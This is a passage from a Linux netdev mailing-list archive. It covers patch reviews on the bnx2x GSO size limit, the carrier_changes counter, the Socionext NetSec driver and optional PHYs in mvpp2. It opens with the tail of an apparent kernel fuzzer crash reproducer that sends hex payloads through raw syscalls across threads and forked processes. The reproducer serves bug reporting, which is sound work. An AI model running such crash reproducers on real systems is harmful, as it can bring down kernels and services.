        "\xb4\x26\xdb\x60\x39\x80\xc2\x14\xc5\xe4\x99\x35\x25\xf9\x48"
        "\x72\xd9\x05\x52\x62\x33\x39\xb2\xc7\x06\x18\x8c\x25\xcf\x7b"
        "\xe2\xf4\x5e\xb3\x21\x36\x7e\x0d\x8a\xd4\x7b\x67\x69\x34\xc0"
        "\x3f\x77\x1f\x11\x67\xb5\x57\x5e\x6d\xfe\x97\xf5\xe2\x05\x38"
        "\x41\xda\x7d\x7d\xe8\x77\xab\xdf\x0f\x5a\x00\x60\x47\x34\xda"
        "\xb1\x3d\x09\x65\xe4\xd7\x9f\xbc\xe9\x69\x40\x19\x1d\x4d\x85"
        "\x52\xd6\xa3\x59\xb0\x47\xcb\xc7\x60\x01\x7d\x2e\x36\x50\x39"
        "\x38\x27\x1b\x20\xc7\x65\xb3\xe8\x54\x9b\x65\xbf\x87\x38\x1b"
        "\x57\x10\x58\xa9\x34\x96\x57\x53\xc9\x00\xda\xe4\x9c\x2f\x65"
        "\xbb\x3b\x32\x91\x7c\x0f\xb7\xb6\x1e\xba\x5b\xe0\xb4\xa1\x06"
        "\x63\x70\xba\x55\x7f\x18\x50\xdb\xa5\xa6\x93\x15\x10\x14\x27"
        "\xe2\xee\xd7\x69\x4c\x66\x07\x86\x46\x0f\x2f\x61\x05\x5f\x74"
        "\x58\xa8\x19\x85\x9e\x89\x17\x0f\x96\xea\x65\x0a\xaa\x32\x33"
        "\x15\xca\x5c\x75\xbb\x79\xa9\x1e\xf7\xa1\x2c\x56\xd8\x25\xad"
        "\x91\x0c\x38\x7c\x69\x8c\xda\x14\xac\xc6\xd7\xc7\x62\x62\xf0"
        "\x25\x23\x87\x27\x28\xed\x13\xc2\x98\xe1\x5c\x70\xa3\x32\x94"
        "\x9c\x79\x75\x50\xb5\x48\xcb\x99\xd4\x79\x41\xb8\x1e\xae\x39"
        "\x57\x8f\x88\xb5\x19\x6a\x8e\x07\xca\xf6\xd3\x47\x82\x14\x07"
        "\xfc\x82\x2f\x70\xf1\xf6\x04\xe6\x5d\xf8\x4d\xe8\xb8\x23\xef"
        "\xe4\x79\xf7\x20\x64\x95\x1a\x2d\x8a\x87\x91\x31\x63\xfa\xdc"
        "\xbe\x42\xd1\x5e\x79\x27\x0f\x7b\x3b\x52\xce\xe6\x3b\xd0\x98"
        "\xed\xbb\xc6\x4d\x01\x4c\xf1\x90\xe6\xfe\x7d\x39\x28\xe6\x05"
        "\xd0\xbd\x4e\xcb\x5a\x83\x2b\x7a\x45\xcb\x76\x37\x42\xee\xb9"
        "\xd0\xea\xb8\x0f\x5d\x1a\xf3\x65\x82\x02\xe2\x8d\x6d\x8f\x21"
        "\xf0\xa8\x70\xd6\x36\xde\x09\x95\x90\xa4\x29\xe4\x1c\xf2\x4e"
        "\xa5\x8b\x15\xf0\x9c\xb0\x98\x0f\x82\x73\x2e\x65\x71\x43\x94"
        "\x77\x83\xd6\x81\x6b\xcd\x60\xba\x9f\xfd\x10\x3e\xaa\x01\xf3"
        "\x08\x7e\x55\x85\xba\x91\xc7\xca\x02\x93\x01\xa0\x95\xf8\x56"
        "\x96\xfe\x46\x03\xfd\xfa\x25\xab\x5d\xa3\x2b\xf3\xa4\xd2\x18"
        "\xfa\x1a\xaf\x94\xf4\x51\xef\xea\x79\x20\x13\xee\xff\x33\x35"
        "\xcf\xe8\xb1\x3b\xee\x3c\x7d\xae\xcd\xaa\xea\xd4\xc6\x05\x94"
        "\x01\xbd\xaa\xa6\x5b\x8c\x3d\x99\xcb\x9e\x8f\x2b\xf5\x07\xb9"
        "\x8b\x3c\x87\x08\xb1\x6b\x04\x59\x05\xff\xd4\x1c\x58\x04\xb0"
        "\x96\x37\x14\x5f\x24\x68\x19\x91\x41\x07\x34\x9a\x0b\xd9\xf5"
        "\x07\x35\x0b\xb4\x87\x35\x22\x8d\x47\x9c\x91\x59\x19\xfd\xe8"
        "\xe2\x11\xe6\x1f\xb0\x6e\xa2\xc1\x61\x18\x79\x5a\xcc\x72\x81"
        "\xa5\x47\x2e\x2e\xb0\xd9\x16\x58\x90\xb0\xbf\x02\xd1\x99\x30"
        "\x7a\x5b\x59\xf2\x61\xe5\x0f\x16\x29\x2e\x58\x58\x26\x96\x7f"
        "\xc9",
        4096));
    r[199] = syscall(__NR_writev, r[1], 0x20007000ul, 0x7ul);
    break;
  case 12:
    NONFAILING(*(uint16_t*)0x2001c000 = (uint16_t)0x2);
    NONFAILING(*(uint16_t*)0x2001c002 = (uint16_t)0x224e);
    NONFAILING(*(uint32_t*)0x2001c004 = (uint32_t)0x20000e0);
    NONFAILING(*(uint8_t*)0x2001c008 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c009 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00a = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00b = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00c = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00d = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00e = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00f = (uint8_t)0x0);
    r[211] = syscall(__NR_connect, r[1], 0x2001c000ul, 0x10ul);
    break;
  }
  return 0;
}

void test()
{
  long i;
  pthread_t th[26];

  memset(r, -1, sizeof(r));
  for (i = 0; i < 13; i++) {
    pthread_create(&th[i], 0, thr, (void*)i);
    usleep(rand() % 10000);
  }
  usleep(rand() % 100000);
}

int main()
{
  int i;
  for (i = 0; i < 4; i++) {
    if (fork() == 0) {
      install_segv_handler();
      use_temporary_dir();
      loop();
      return 0;
    }
  }
  sleep(1000000);
  return 0;
}

^ permalink raw reply

* Re: [PATCH] bnx2x: drop packets where gso_size is too big for hardware
From: Eric Dumazet @ 2017-08-31  6:02 UTC (permalink / raw)
  To: Daniel Axtens
  Cc: netdev, tlfalcon, Yuval.Mintz, ariel.elior, everest-linux-l2,
	jay.vosburgh
In-Reply-To: <20170831054642.13721-1-dja@axtens.net>

On Thu, 2017-08-31 at 15:46 +1000, Daniel Axtens wrote:
> If a bnx2x card is passed a GSO packet with a gso_size larger than
> ~9700 bytes, it will cause a firmware error that will bring the card
> down:
> 
> bnx2x: [bnx2x_attn_int_deasserted3:4323(enP24p1s0f0)]MC assert!
> bnx2x: [bnx2x_mc_assert:720(enP24p1s0f0)]XSTORM_ASSERT_LIST_INDEX 0x2
> bnx2x: [bnx2x_mc_assert:736(enP24p1s0f0)]XSTORM_ASSERT_INDEX 0x0 = 0x00000000 0x25e43e47 0x00463e01 0x00010052
> bnx2x: [bnx2x_mc_assert:750(enP24p1s0f0)]Chip Revision: everest3, FW Version: 7_13_1
> ... (dump of values continues) ...
> 
> Detect when gso_size + header length is greater than the maximum
> packet size (9700 bytes) and drop the packet.
> 
> This raises the obvious question - how do we end up with a packet with
> a gso_size that's greater than 9700? This has been observed on an
> powerpc system when Open vSwitch is forwarding a packet from an
> ibmveth device.
> 
> ibmveth is a bit special. It's the driver for communication between
> virtual machines (aka 'partitions'/LPARs) running under IBM's
> proprietary hypervisor on ppc machines. It allows sending very large
> packets (up to 64kB) between LPARs. This involves some quite
> 'interesting' things: for example, when talking TCP, the MSS is stored
> the checksum field (see ibmveth_rx_mss_helper() in ibmveth.c).
> 
> Normally on a box like this, there would be a Virtual I/O Server
> (VIOS) partition that owns the physical network card. VIOS lets the
> AIX partitions know when they're talking to a real network and that
> they should drop their MSS. This works fine if VIOS owns the physical
> network card.
> 
> However, in this case, a Linux partition owns the card (this is known
> as a NovaLink setup). The negotiation between VIOS and AIX uses a
> non-standard TCP option, so Linux has never supported that.  Instead,
> Linux just supports receiving large packets. It doesn't support any
> form of messaging/MSS negotiation back to other LPARs.
> 
> To get some clarity about where the large MSS was coming from, I asked
> Thomas Falcon, the maintainer of ibmveth, for some background:
> 
> "In most cases, large segments are an aggregation of smaller packets
> by the Virtual I/O Server (VIOS) partition and then are forwarded to
> the Linux LPAR / ibmveth driver. These segments can be as large as
> 64KB. In this case, since the customer is using Novalink, I believe
> what is happening is pretty straightforward: the large segments are
> created by the AIX partition and then forwarded to the Linux
> partition, ... The ibmveth driver doesn't do any aggregation itself
> but just ensures the proper bits are set before sending the frame up
> to avoid giving the upper layers indigestion."
> 
> It is possible to stop AIX from sending these large segments, but it
> requires configuration on each LPAR. While ibmveth's behaviour is
> admittedly weird, we should fix this here: it shouldn't be possible
> for it to cause a firmware panic on another card.
> 



This is so weird :/

> Cc: Thomas Falcon <tlfalcon@linux.vnet.ibm.com> # ibmveth
> Cc: Yuval Mintz <Yuval.Mintz@cavium.com> # bnx2x
> Thanks-to: Jay Vosburgh <jay.vosburgh@canonical.com> # veth info
> Signed-off-by: Daniel Axtens <dja@axtens.net>
> ---
>  drivers/net/ethernet/broadcom/bnx2x/bnx2x.h      |  2 ++
>  drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c  | 33 +++++++++++++++---------
>  drivers/net/ethernet/broadcom/bnx2x/bnx2x_link.c |  1 -
>  3 files changed, 23 insertions(+), 13 deletions(-)
> 
> diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
> index 352beff796ae..b36d54737d70 100644
> --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
> +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
> @@ -2517,4 +2517,6 @@ void bnx2x_set_rx_ts(struct bnx2x *bp, struct sk_buff *skb);
>   */
>  int bnx2x_vlan_reconfigure_vid(struct bnx2x *bp);
>  
> +#define MAX_PACKET_SIZE	(9700)
> +
>  #endif /* bnx2x.h */
> diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
> index 1216c1f1e052..1c5517a9348c 100644
> --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
> +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c
> @@ -3742,6 +3742,7 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev)
>  	__le16 pkt_size = 0;
>  	struct ethhdr *eth;
>  	u8 mac_type = UNICAST_ADDRESS;
> +	unsigned int pkts_compl = 0, bytes_compl = 0;
>  
>  #ifdef BNX2X_STOP_ON_ERROR
>  	if (unlikely(bp->panic))
> @@ -4029,6 +4030,14 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev)
>  		   skb->len, hlen, skb_headlen(skb),
>  		   skb_shinfo(skb)->gso_size);
>  
> +		if (unlikely(skb_shinfo(skb)->gso_size + hlen > MAX_PACKET_SIZE)) {
> +			BNX2X_ERR("reported gso segment size plus headers "
> +				  "(%d + %d) > MAX_PACKET_SIZE; dropping pkt!",
> +				  skb_shinfo(skb)->gso_size, hlen);
> +
> +			goto free_and_drop;
> +		}
> +


If you had this test in bnx2x_features_check(), packet could be
segmented by core networking stack before reaching bnx2x_start_xmit() by
clearing NETIF_F_GSO_MASK

-> No drop would be involved.

check i40evf_features_check() for similar logic.

^ permalink raw reply

* RE: netdev carrier changes is one even after ethernet link up.
From: Bhadram Varka @ 2017-08-31  6:03 UTC (permalink / raw)
  To: andrew@lunn.ch, f.fainelli@gmail.com; +Cc: linux-netdev
In-Reply-To: <974898714b3e4e59b933983ded977ce2@bgmail102.nvidia.com>

+ netdev

From: Bhadram Varka 
Sent: Thursday, August 31, 2017 11:24 AM
To: 'andrew@lunn.ch' <andrew@lunn.ch>; 'f.fainelli@gmail.com' <f.fainelli@gmail.com>
Cc: linux-netdev <netdev@vger.kernel.org>
Subject: netdev carrier changes is one even after ethernet link up.

Hi,

I have observed that carrier_changes is one even in case of the ethernet link is up.
 
After investigating the code below is my observation -

ethernet_driver_probe()
+--->phy_connect()
|     +--->phy_attach_direct()
|           +---> netif_carrier_off()    : which increments carrier_changes to one.
+--->register_netdevice() : will the carrier_changes becomes zero here ?
+--->netif_carrier_off(): not increment the carrier_changes since __LINK_STATE_NOCARRIER already set.
 
>From ethernet driver open will start the PHY and trigger the phy_state_machine. 
Phy_state_machine workqueue calling netif_carrier_on() once the link is UP.
netif_carrier_on() increments the carrier_changes by one.
 
After link is UP if we check the carrier_changes sysfs node - it will be one only.
 
$ cat /sys/class/net/eth0/carrier_changes
1
 
After reverting the change - https://lkml.org/lkml/2016/1/9/173 (net: phy: turn carrier off on phy attach) then I could see the carrier changes incremented to 2 after Link UP.
$ cat /sys/class/net/eth0/carrier_changes
2

Thanks,
Bhadram.
-----------------------------------------------------------------------------------
This email message is for the sole use of the intended recipient(s) and may contain
confidential information.  Any unauthorized review, use, disclosure or distribution
is prohibited.  If you are not the intended recipient, please contact the sender by
reply email and destroy all copies of the original message.
-----------------------------------------------------------------------------------

^ permalink raw reply

* Re: [net-next PATCHv6 0/2] net: ethernet: Socionext Netsec
From: Jassi Brar @ 2017-08-31  6:31 UTC (permalink / raw)
  To: Florian Fainelli
  Cc: linux-arm-kernel-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r@public.gmane.org,
	netdev-u79uwXL29TY76Z2rM5mHXA, Devicetree List, David S . Miller,
	Mark Rutland, arnd-r2nGTMty4D4@public.gmane.org,
	patches-QSEj5FYQhm4dnm+yROfE0A@public.gmane.org, Jassi Brar,
	Rob Herring, Andy Green
In-Reply-To: <27A7C5A5-AFF4-49F3-B0DF-7F53283EC2A4-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>

On Thu, Aug 31, 2017 at 9:36 AM, Florian Fainelli <f.fainelli-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org> wrote:
> On August 30, 2017 3:24:17 AM PDT, Jassi Brar <jassisinghbrar-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org> wrote:
>>Hello,
>>
>>The OGMA/Netsec controller is used in latest SoC from
>>Socionext/Fujitsu.
>>
>>I am refreshing the patchset by basically using official name of the IP
>>from 'OGMA' to 'Netsec'. And the company is renamed too, from Fujitsu
>>to Socionext to better reflect the reality.
>>
>> I have addressed comments (that could be) on the last revision -->
>>https://patchwork.kernel.org/patch/4540651/
>>
>> Of course, I have scanned changes to the drivers/net/ethernet since
>>last submission and integrated whichever applicable and rebased the
>>driver on top of last rc.
>
> It does not appear to be at first glance, but I will just ask anyways, this is not yet another variant of stmmac glued just a little bit differently into the SoC right?
>
Sorry, no idea. I will be glad if we could reuse existing code.

Thanks.
--
To unsubscribe from this list: send the line "unsubscribe devicetree" in
the body of a message to majordomo-u79uwXL29TY76Z2rM5mHXA@public.gmane.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply

* Re: [net-next PATCHv6 2/2] net: socionext: Add NetSec driver
From: Jassi Brar @ 2017-08-31  6:33 UTC (permalink / raw)
  To: Andrew Lunn
  Cc: netdev-u79uwXL29TY76Z2rM5mHXA, Devicetree List,
	linux-arm-kernel-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r@public.gmane.org,
	David S . Miller, Mark Rutland, arnd-r2nGTMty4D4@public.gmane.org,
	patches-QSEj5FYQhm4dnm+yROfE0A@public.gmane.org, Jassi Brar,
	Rob Herring, Andy Green
In-Reply-To: <20170830171759.GC22289-g2DYL2Zd6BY@public.gmane.org>

On Wed, Aug 30, 2017 at 10:47 PM, Andrew Lunn <andrew-g2DYL2Zd6BY@public.gmane.org> wrote:
>> +static int netsec_mac_update_to_phy_state(struct netsec_priv *priv)
>> +{
>> +     struct phy_device *phydev = priv->ndev->phydev;
>> +     u32 value = 0;
>> +
>> +     value = phydev->duplex ? NETSEC_GMAC_MCR_REG_FULL_DUPLEX_COMMON :
>> +                                    NETSEC_GMAC_MCR_REG_HALF_DUPLEX_COMMON;
>> +
>> +     if (phydev->speed != SPEED_1000)
>> +             value |= NETSEC_MCR_PS;
>> +
>> +     if ((priv->phy_interface != PHY_INTERFACE_MODE_GMII) &&
>> +         (phydev->speed == SPEED_100))
>> +             value |= NETSEC_GMAC_MCR_REG_FES;
>> +
>> +     value |= NETSEC_GMAC_MCR_REG_CST | NETSEC_GMAC_MCR_REG_JE;
>> +
>> +     if (priv->phy_interface == PHY_INTERFACE_MODE_RGMII)
>> +             value |= NETSEC_GMAC_MCR_REG_IBN;
>> +
>> +     if (netsec_mac_write(priv, GMAC_REG_MCR, value))
>> +             return -ETIMEDOUT;
>> +
>> +     priv->actual_link_speed = phydev->speed;
>> +     priv->actual_duplex = phydev->duplex;
>> +     netif_info(priv, drv, priv->ndev, "%s: %uMbps, duplex:%d\n",
>> +                __func__, phydev->speed, phydev->duplex);
>
> phy_print_status()
>
>> +     mac = of_get_mac_address(pdev->dev.of_node);
>> +     if (mac)
>> +             ether_addr_copy(ndev->dev_addr, mac);
>> +
>> +     if (!is_valid_ether_addr(ndev->dev_addr)) {
>> +             eth_hw_addr_random(ndev);
>> +             dev_warn(&pdev->dev, "No MAC address found, using random\n");
>> +     }
>
> So the mac address is optional, unlike what the binding document says.
>
>> +     priv->phy_np = of_parse_phandle(pdev->dev.of_node, "phy-handle", 0);
>> +     if (!priv->phy_np) {
>> +             netif_err(priv, probe, ndev, "missing phy in DT\n");
>
> It is the phy-handle which is missing, not the phy.
>
>> +
>> +     /* MTU range */
>> +     ndev->min_mtu = ETH_MIN_MTU;
>
> No need to set this, it is the default.
>
> Otherwise, this looks good, in terms of phy and mdio.
>
Will fix these.

Thanks.
--
To unsubscribe from this list: send the line "unsubscribe devicetree" in
the body of a message to majordomo-u79uwXL29TY76Z2rM5mHXA@public.gmane.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply

* Re: [GIT] Networking
From: Pavel Machek @ 2017-08-31  6:52 UTC (permalink / raw)
  To: Kalle Valo
  Cc: David Miller, xiyou.wangcong, torvalds, akpm, netdev,
	linux-kernel
In-Reply-To: <87fuc8s5v9.fsf@kamboji.qca.qualcomm.com>

[-- Attachment #1: Type: text/plain, Size: 1112 bytes --]

On Thu 2017-08-31 07:44:58, Kalle Valo wrote:
> David Miller <davem@davemloft.net> writes:
> 
> > From: Kalle Valo <kvalo@codeaurora.org>
> > Date: Wed, 30 Aug 2017 20:31:31 +0300
> >
> >> AFAICS the bug was introduced by 9df86e2e702c6 back in 2010. If the bug
> >> has been there for 7 years so waiting for a few more weeks should not
> >> hurt.
> >
> > As a maintainer you have a right to handle bug fixing in that way, but
> > certainly that is not how I would handle this.
> >
> > It's easy to validate this fix, it's extremely unlikely to cause
> > a regression, and fixes a problem someone actually was able to
> > trigger.
> >
> > Deferring to -next only has the side effect of making people wait
> > longer for the fix.
> 
> Yeah, you are right there. I did actually ponder which I tree should
> commit it back in July but due to various reasons decided differently.

Can we still get the fix to v4.13-final? :-).

Thanks,
									Pavel
-- 
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html

[-- Attachment #2: Digital signature --]
[-- Type: application/pgp-signature, Size: 181 bytes --]

^ permalink raw reply

* [PATCH net-next 0/3] net: mvpp2: optional PHYs and GoP link irq
From: Antoine Tenart @ 2017-08-31  7:12 UTC (permalink / raw)
  To: davem
  Cc: Antoine Tenart, andrew, gregory.clement, thomas.petazzoni, nadavh,
	linux, linux-kernel, mw, stefanc, miquel.raynal, netdev

Hi all,

This series aims at make the driver work when no PHY is connected
between a port and the physical layer and not described as a fixed-phy.
This is useful for some usecases such as when a switch is connected
directly to the serdes lanes. It can also be used for SFP ports on the
7k-db and 8k-db while waiting for the phylink support to land in (which
should be part of another series).

This series makes the phy optional in the PPv2 driver, and then adds
the support for the GoP port link interrupt to handle link status
changes on such ports.

This was tested using the SFP ports on the 7k-db and 8k-db boards.

Thanks!
Antoine

Antoine Tenart (3):
  net: mvpp2: make the phy optional
  net: mvpp2: use the GoP interrupt for link status changes
  Documentation/bindings: net: marvell-pp2: add the link interrupt

 .../devicetree/bindings/net/marvell-pp2.txt        |   2 +-
 drivers/net/ethernet/marvell/mvpp2.c               | 208 +++++++++++++++++++--
 2 files changed, 196 insertions(+), 14 deletions(-)

-- 
2.13.5

^ permalink raw reply

* [PATCH net-next 1/3] net: mvpp2: make the phy optional
From: Antoine Tenart @ 2017-08-31  7:12 UTC (permalink / raw)
  To: davem
  Cc: Antoine Tenart, andrew, gregory.clement, thomas.petazzoni, nadavh,
	linux, linux-kernel, mw, stefanc, miquel.raynal, netdev
In-Reply-To: <20170831071256.18416-1-antoine.tenart@free-electrons.com>

There is not necessarily a PHY between the GoP and the physical port.
However, the driver currently makes the "phy" property mandatory,
contrary to what is stated in the device tree bindings. This patch makes
the PHY optional, and aligns the PPv2 driver on its device tree
documentation. However if a PHY is provided, the GoP link interrupt
won't be used.

With this patch switches directly connected to the serdes lanes and SFP
ports on the Armada 8040-db and Armada 7040-db can be used if the link
interrupt is described in the device tree.

Signed-off-by: Antoine Tenart <antoine.tenart@free-electrons.com>
Tested-by: Marcin Wojtas <mw@semihalf.com>
---
 drivers/net/ethernet/marvell/mvpp2.c | 19 +++++++++++--------
 1 file changed, 11 insertions(+), 8 deletions(-)

diff --git a/drivers/net/ethernet/marvell/mvpp2.c b/drivers/net/ethernet/marvell/mvpp2.c
index 9e64b1ba3d43..1916a4035ea0 100644
--- a/drivers/net/ethernet/marvell/mvpp2.c
+++ b/drivers/net/ethernet/marvell/mvpp2.c
@@ -6484,7 +6484,8 @@ static void mvpp2_start_dev(struct mvpp2_port *port)
 
 	mvpp2_port_mii_set(port);
 	mvpp2_port_enable(port);
-	phy_start(ndev->phydev);
+	if (ndev->phydev)
+		phy_start(ndev->phydev);
 	netif_tx_start_all_queues(port->dev);
 }
 
@@ -6510,7 +6511,8 @@ static void mvpp2_stop_dev(struct mvpp2_port *port)
 
 	mvpp2_egress_disable(port);
 	mvpp2_port_disable(port);
-	phy_stop(ndev->phydev);
+	if (ndev->phydev)
+		phy_stop(ndev->phydev);
 	phy_power_off(port->comphy);
 }
 
@@ -6567,6 +6569,10 @@ static int mvpp2_phy_connect(struct mvpp2_port *port)
 {
 	struct phy_device *phy_dev;
 
+	/* No PHY is attached */
+	if (!port->phy_node)
+		return 0;
+
 	phy_dev = of_phy_connect(port->dev, port->phy_node, mvpp2_link_event, 0,
 				 port->phy_interface);
 	if (!phy_dev) {
@@ -6587,6 +6593,9 @@ static void mvpp2_phy_disconnect(struct mvpp2_port *port)
 {
 	struct net_device *ndev = port->dev;
 
+	if (!ndev->phydev)
+		return;
+
 	phy_disconnect(ndev->phydev);
 }
 
@@ -7375,12 +7384,6 @@ static int mvpp2_port_probe(struct platform_device *pdev,
 		return -ENOMEM;
 
 	phy_node = of_parse_phandle(port_node, "phy", 0);
-	if (!phy_node) {
-		dev_err(&pdev->dev, "missing phy\n");
-		err = -ENODEV;
-		goto err_free_netdev;
-	}
-
 	phy_mode = of_get_phy_mode(port_node);
 	if (phy_mode < 0) {
 		dev_err(&pdev->dev, "incorrect phy mode\n");
-- 
2.13.5

^ permalink raw reply related


This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox